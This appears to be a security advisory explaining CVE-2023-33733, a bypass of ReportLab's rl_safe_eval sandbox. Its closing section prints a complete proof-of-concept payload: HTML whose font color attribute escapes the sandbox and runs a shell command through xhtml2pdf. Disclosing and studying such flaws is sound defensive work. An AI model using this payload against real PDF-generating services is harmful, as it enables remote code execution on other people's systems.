CVE-2023-33733: RCE Vulnerability in ReportLab Python Library

In the vibrant ecosystem of Python libraries, ReportLab has long established itself as a potent tool for creating Adobe’s Portable Document Format (PDF) files and crafting charts and data graphics in various bitmap, vector formats, as well as PDF. Yet, beneath this shining facade of utility, a lurking vulnerability identified as CVE-2023-33733 may turn this resourceful library into a surreptitious weapon in the hands of malicious entities.

Recently, during an audit of a web application, the application was found to employ the ReportLab Python library for the dynamic generation of PDF files from HTML input. An intriguing discovery was made that the library harbored a previously patched vulnerability leading to code execution. For an attacker, finding a bypass to this patch would pave the way to the rediscovery of the code execution. This becomes a matter of grave concern, especially considering the widespread use of the ReportLab library in a multitude of applications and tools.

In 2019, a similar exploit in the library had led to remote code execution via the Color attribute of HTML tags. The attribute content was directly evaluated as a Python expression using the eval function, thus triggering code execution. To mitigate this issue, ReportLab implemented a sandbox named ‘rl_safe_eval‘. Devoid of all Python built-in functions and equipped with multiple overridden built-in functions, this sandbox was designed to safely execute library code while curtailing access to dangerous functions and libraries that could potentially lead to the construction of malicious Python code.

This ‘safe eval‘ function, as explained earlier, purifies the environment from all potentially dangerous functions, creating a secure execution space. However, should a bypass be discovered, it would expose the original built-in functions, thereby making the sandboxed environment highly exploitable.

One such overridden built-in class is ‘type‘. Used with a single argument, it returns the type of an object. Yet, when employed with three arguments, it provides a new type object—effectively a dynamic form of the class statement, permitting the creation of a new class that inherits from another.

The key to the CVE-2023-33733 vulnerability lies in the creation of a new class called ‘Word’ that inherits from ‘str’. When passed to the custom ‘getattr’, it bypasses the checks, permitting access to sensitive attributes like ‘__code__‘.

Renowned researcher c53elyas has released a proof-of-concept (POC) demonstrating this code execution. Successful exploitation results in the creation of a file named ‘exploited’ in ‘/tmp/’. This vulnerability has wide-reaching implications, as numerous applications and libraries utilize ReportLab, such as the ‘xhtml2pdf’ utility function, which is susceptible to code execution while transforming malicious HTML to PDF.

cat >mallicious.html <<EOF

<para><font color="[ [ [ [ [ ftype(ctype(0, 0, 0, 0, 3, 67, b't\\x00d\\x01\\x83\\x01\\xa0\\x01d\\x02\\xa1\\x01\\x01\\x00d\\x00S\\x00', (none, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\\x12\\x01'), {})() for ftype in [type(lambda: none)] ] for ctype in [type(getattr(lambda: {none}, Word('__code__')))] ] for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1==0, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] for none in  [[].append(1)]]]">

                exploit

                </font></para>

EOF



xhtml2pdf mallicious.html

ls -al /tmp/exploited

``